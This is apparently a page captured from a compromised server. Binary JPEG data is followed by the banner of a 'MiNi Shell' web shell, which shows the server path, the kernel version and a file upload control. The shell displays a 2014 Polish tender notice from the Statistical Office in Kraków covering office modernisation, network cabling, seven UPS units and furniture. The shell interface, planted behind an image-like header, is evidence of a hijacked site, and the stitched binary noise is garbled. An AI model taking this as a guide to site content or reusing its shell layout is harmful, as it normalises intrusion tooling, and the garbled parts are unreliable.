JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140722/159589-N-2014.html

<p class="kh_header"><b>Kraków: MODERNIZACJA REGIONALNEGO OŚRODKA INFORMACJI, WRAZ Z ADAPTACJĄ POMIESZCZEŃ I BUDOWĄ STANOWISK PRACY W URZĘDZIE STATYSTYCZNYM W KRAKOWIE
1.	Część I - modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP-2
2.     Część II -  rozbudowa sieci energetycznej i strukturalnej (punkty dostępowe) - 12 sztuk
3.     Cześć III - dostawa 7 sztuk UPS do Urzędu Statystycznego w Krakowie
4.  Część IV - Wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP-2.</b><br>
<b>Numer ogłoszenia: 159589 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Statystyczny w Krakowie , ul. Kazimierza Wyki 3, 31-223 Kraków, woj. małopolskie, tel. (012) 4204050, 4154051, faks (012) 415 40 58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.stat.gov.pl/zamowienia-publiczne-us/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA REGIONALNEGO OŚRODKA INFORMACJI, WRAZ Z ADAPTACJĄ POMIESZCZEŃ I BUDOWĄ STANOWISK PRACY W URZĘDZIE STATYSTYCZNYM W KRAKOWIE
1.	Część I - modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP-2
2.     Część II -  rozbudowa sieci energetycznej i strukturalnej (punkty dostępowe) - 12 sztuk
3.     Cześć III - dostawa 7 sztuk UPS do Urzędu Statystycznego w Krakowie
4.  Część IV - Wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP-2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I  modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP2
Przedmiotem zamówienia jest modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP2.
Szczegółowy zakres zamówienia zawiera przedmiar załącznik nr 8, specyfikacja techniczna, opis projektu aranżacji oraz rzuty załączniki nr 8a8d 
Część II rozbudowa sieci energetycznej i strukturalnej punkty dostępowe 12 sztuk
Przedmiotem zamówienia jest rozbudowa sieci energetycznej i strukturalnej punkty dostępowe12 szt.
Szczegółowy zakres zamówienia zawiera Opis Przedmiotu Zamówienia, stanowiący załącznik nr 9 i 9a do SIWZ.
Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej zrealizowanego systemu okablowania strukturalnego wraz z dedykowanym zasilaniem elektrycznym i przekazania jej Zamawiającemu w dwóch egzemplarzach w języku polskim w formie papierowej oraz w formie elektronicznej w ogólnie przyjętym standardzie plików np. dwg lub pdf.
Cześć III  dostawa 7 sztuk UPS do Urzędu Statystycznego w Krakowie
Dostawa 7 sztuk UPS
Wszystkie dostarczone UPS powinny być tego samego producenta 
Nazwa elementu, parametru lub cechy	Opis wymagań
Moc pozorna 3000 VA
Moc rzeczywista 2700 W
Architektura UPSa 	podwójne przetwarzanie online, VFI wg PNEN 620403
Maks. czas przełączenia na baterię 0 ms
Kształt napięcia wyjściowego przy pracy bateryjnejSinusoidalny
Typ gniazda wejściowego  IEC320 C20 16A 
Czas podtrzymania dla obciążenia 100% przy współczynniku cos  0,9min. 3 minuty
Czas podtrzymania przy obciążeniu 50% przy współczynniku cos 0,9min.9 minut
Czas podtrzymania dla obciążenia 100% z dodatkowym modułem baterii przy współczynniku cos  0,9min.18 minut
Czas podtrzymania przy obciążeniu 50% z dodatkowym modułem baterii przy współczynniku cos 0,9min.45 minut
Zakres napięcia wejściowego w trybie podstawowym 180  276 V
Zakres zmian napięcia wyjściowego maksymalnie 2% wartości nominalnej
Baterie wymieniane przez użytkownika na gorąco Tak
Możliwość uruchomienia zasilacza z baterii tzw. Zimny start Tak
Baterie wewnętrzne, bezobsługowe o minimalnej pojemności 9Ah 12V. 
Dodatkowy moduł baterii Tak
Porty komunikacji RS232, USB, gniazdo rozszerzenia opcji komunikacji do instalacji karty SNMPWeb z możliwością monitorowania środowiska, gniazdo wyłącznika awaryjnego p.poż. 
Panel komunikacyjny Graficzny panel LCD z odczytem parametrów zasilacza, informacjami o stanie jego pracy i informacjami o alarmach
Typ obudowy Rack 19 maksymalna wysokość 2U
Dołączone oprogramowanie 	Do bezpiecznego zamykania systemów operacyjnych przy wyczerpaniu baterii minimum:
Windows: 7  2008 Vista  2003 XP
Linux: Debian GNU Linux Lenny,
SUSE/Novell: SLES 11, OpenSUSE 11.2, 
Redhat Enterprise Linux: RHEL 5.3, 5.4, 5.5, Fedora core 12 
Ubuntu: 10.04
VMWare: ESX 4, ESXi 4 wersja komercyjna, ESXi 4.10 wersja komercyjnaHyperV: Hyper-V i  Hyper V Server. Oprogramowanie pozwlające na integrację z platformą wirtualizacyjną Vmware: vCenter Server
System zarządzania pracą baterii System nieciągłego ładowania baterii. Do oferty dołączyć należy opis algorytmu ładowania nieciągłego baterii. W opisie znaleźć się muszą informacje nt. trwania okresów ładowania forsującego, konserwującego i okresu spoczynkowego tzw. restingu. Okres spoczynkowy w jednym cyklu nie może być krótszy niż 14 dni. Opis powinien być materiałem firmowym producenta lub musi być przez niego potwierdzony.
Cechy Możliwość wydłużenia czasu podtrzymania do 65 min. przy 100% obc. poprzez dołączenie baterii zewnętrznych, wysokość systemu po wydłużeniu czasu podtrzymania do 65 min. nie może przekroczyć 10U
Gwarancja producenta minimum 24 miesiące Tak
Część IV  Wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP2.
Przedmiotem zamówienia jest wyposażenie w meble pomieszczeń Informatorium w ramach projektu SISP2.
Szczegółowy zakres zamówienia zawiera Opis Przedmiotu Zamówienia, stanowiący załączniki nr 20 i 20a-20e do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 44.11.10.00-1, 32.41.00.00-0, 45.31.00.00-3, 31.15.40.00-0, 39.13.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część I 
Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 3.600 zł - słownie: trzy tysiące sześćset złotych 00/100
Część II 
Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 320 zł - słownie: trzysta dwadzieścia złotych 00/100
Część III
Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 780 zł - słownie: siedemset osiemdziesiąt złotych 00/100
Część IV 
Wykonawca przystępując do przetargu jest obowiązany  wnieść wadium w wysokości: 960,00 zł słownie: dziewięćset sześćdziesiąt złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ (Część I - Załącznik nr 2), według formuły spełnia/nie spełnia.
Część II-IV
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że należycie wykonał w ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną, polegającą na remoncie lub przebudowie budynku użyteczności publicznej w rozumieniu § 3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków  technicznych, jakim powinny odpowiadać budynki i ich usytuowanie. (Dz.U. z 2002 r. Nr 75, poz. 690 z póżn. zm.) o wartości  nie niższej niż 180 000 PLN brutto.  
W celu wykazania, że wykonawca posiada wiedzę i doświadczenie Zamawiający wymaga przedstawienia wykazu, o którym mowa w pkt 8.1 SIWZ. 
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego wykazu/oświadczenia /informacji, według formuły spełnia/nie spełnia
Część II-IV
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania, że wykonawca posiada osoby zdolne do wykonania zamówienia Zamawiający wymaga przedstawienia wykazu osób i oświadczenia, o których mowa odpowiednio w pkt 8.3  i 8.4 SIWZ.
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego wykazu/oświadczenia /informacji, według formuły spełnia/nie spełnia
Część II-IV
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania, że wykonawca posiada osoby zdolne do wykonania zamówienia Zamawiający wymaga przedstawienia wykazu osób i oświadczenia, o których mowa odpowiednio w pkt 8.3  i 8.4 SIWZ.
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego wykazu/oświadczenia /informacji, według formuły spełnia/nie spełnia
Część II-IV
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ, według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 180 000 PLN.
W celu wykazania, że wykonawca posiada zdolność ekonomiczną i finansową Zamawiający wymaga przedstawienia informacji, o której mowa w pkt 8.2 SIWZ.
Zamawiający dokona oceny spełniania ww. warunku na podstawie złożonego wykazu/oświadczenia /informacji, według formuły spełnia/nie spełnia
Część II-IV
Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokona oceny spełniania ww. warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 8 SIWZ, według formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>brak</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany treści Umowy w przypadku gdy:
1)	zaistnieją okoliczności skutkujące koniecznością dokonania zmian, których nie można było przewidzieć w momencie zawierania Umowy, a są korzystne dla Zamawiającego, przy czym zmiany te nie mogą wpływać na wysokość wynagrodzenia należnego Wykonawcy,
2)	zaistnieje przerwa w realizacji zamówienia z przyczyn niezależnych od Wykonawcy, 
w szczególności w sytuacji gdy zaistnieją okoliczności wskazujące na wystąpienie siły wyższej.
2.	Zamawiający dopuszcza w wyjątkowych wypadkach możliwość ewentualnego zastąpienia określonych elementów przedmiotu Umowy innymi (elementami równoważnymi), jeżeli powstaną obiektywne przyczyny uniemożliwiające dostarczenie zaoferowanych elementów przedmiotu Umowy, a dostarczone elementy zamienne będą tej samej lub wyższej, jakości, niż te elementy, które są nimi zastępowane (elementy te muszą spełniać, co najmniej wymagania określone w SIWZ). W takim przypadku dokonanie zamiany odbywa się za zgodą wyrażoną na piśmie przez upoważnionego przedstawiciela Zamawiającego na wyłączny koszt Wykonawcy.
3.	Zaistnienie sytuacji określonej w ust. 1 pkt 2) może stanowić podstawę do wystąpienia przez Wykonawcę do Zamawiającego o przedłużenie terminu realizacji Umowy o okres odpowiadający okresowi zaistniałej przerwy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krakow.stat.gov.pl/zamowienia-publiczne-us/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Statystyczny w Krakowie 
ul. Kazimierza Wyki 3
31-223 Kraków
pok. 021.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2014 godzina 11:00, miejsce: Urząd Statystyczny w Krakowie 
ul. Kazimierza Wyki 3
31-223 Kraków
pok. 021.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP-2
Przedmiotem zamówienia jest modernizacja pomieszczeń biurowych na potrzeby stworzenia Informatorium w ramach projektu SISP-2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Szczegółowy zakres zamówienia zawiera przedmiar (załącznik nr 8), specyfikacja techniczna, opis projektu aranżacji oraz rzuty (załączniki nr 8a-8d).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 44.11.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
